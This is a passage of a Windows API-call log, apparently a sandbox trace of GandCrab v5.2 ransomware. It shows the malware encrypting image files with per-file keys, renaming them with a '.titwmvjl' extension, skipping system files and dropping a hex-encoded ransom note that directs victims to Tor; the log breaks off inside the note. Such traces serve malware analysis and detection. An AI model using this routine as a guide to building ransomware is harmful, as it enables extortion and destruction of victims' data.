VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.005] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.005] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.005] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0094.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.006] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.006] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.006] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.006] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.007] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.007] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.007] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0094.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.007] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.007] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.007] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.008] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0094.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.008] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.008] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.008] GetLastError () returned 0x0 [0094.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.009] CryptDestroyKey (hKey=0x503338) returned 1 [0094.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.009] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.009] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.009] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0094.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.010] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.010] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.010] GetLastError () returned 0x0 [0094.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.010] CryptDestroyKey (hKey=0x503278) returned 1 [0094.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.010] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.010] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.011] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.011] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xd15a, lpOverlapped=0x0) returned 1 [0094.022] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff2ea6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd15a, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xd15a, lpOverlapped=0x0) returned 1 [0094.024] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0094.025] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.029] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.030] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.030] CloseHandle (hObject=0x2b4) returned 1 [0094.030] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\h1bf6lmj.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\h1bf6lmj.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0094.031] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.031] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.031] lstrcmpW (lpString1="o6NGpRJy.jpg", lpString2=".") returned 1 [0094.031] lstrcmpW (lpString1="o6NGpRJy.jpg", lpString2="..") returned 1 [0094.031] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="o6NGpRJy.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg" [0094.031] lstrlenW (lpString=".titwmvjl") returned 9 [0094.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned 48 [0094.031] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.032] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg.titwmvjl") returned 57 [0094.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned 48 [0094.033] lstrlenW (lpString=".jpg") returned 4 [0094.033] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.034] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.034] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.034] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned 48 [0094.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned 48 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="desktop.ini") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="autorun.inf") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="ntuser.dat") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="iconcache.db") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="bootsect.bak") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="boot.ini") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="ntuser.dat.log") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="thumbs.db") returned -1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="ntldr") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="NTDETECT.COM") returned 1 [0094.034] lstrcmpiW (lpString1="o6NGpRJy.jpg", lpString2="Bootfont.bin") returned 1 [0094.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg") returned 48 [0094.034] lstrlenW (lpString=".jpg") returned 4 [0094.034] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.034] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.035] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.035] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.035] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\o6ngprjy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0094.035] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.036] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0094.036] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.036] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.037] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.037] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.037] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.037] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.037] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0094.037] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.038] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.038] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.038] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.038] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.039] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.039] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.039] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0094.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.039] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.039] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.039] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.040] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0094.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.040] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.040] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.040] GetLastError () returned 0x0 [0094.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.040] CryptDestroyKey (hKey=0x503478) returned 1 [0094.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.041] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.041] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.041] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0094.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.041] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.042] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.042] GetLastError () returned 0x0 [0094.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.042] CryptDestroyKey (hKey=0x503378) returned 1 [0094.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.042] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.042] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.042] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.043] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x167b7, lpOverlapped=0x0) returned 1 [0094.056] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe9849, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x167b7, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x167b7, lpOverlapped=0x0) returned 1 [0094.057] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0094.059] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.062] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.063] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.063] CloseHandle (hObject=0x2b4) returned 1 [0094.064] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\o6ngprjy.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\o6NGpRJy.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\o6ngprjy.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.064] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.064] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.064] lstrcmpW (lpString1="r7lDY-Y1hTWn", lpString2=".") returned 1 [0094.064] lstrcmpW (lpString1="r7lDY-Y1hTWn", lpString2="..") returned 1 [0094.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="r7lDY-Y1hTWn" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn" [0094.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\" [0094.065] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.070] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.070] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.071] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.071] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.071] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.071] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\\\TITWMVJL-DECRYPT.txt") returned 70 [0094.071] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0094.072] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6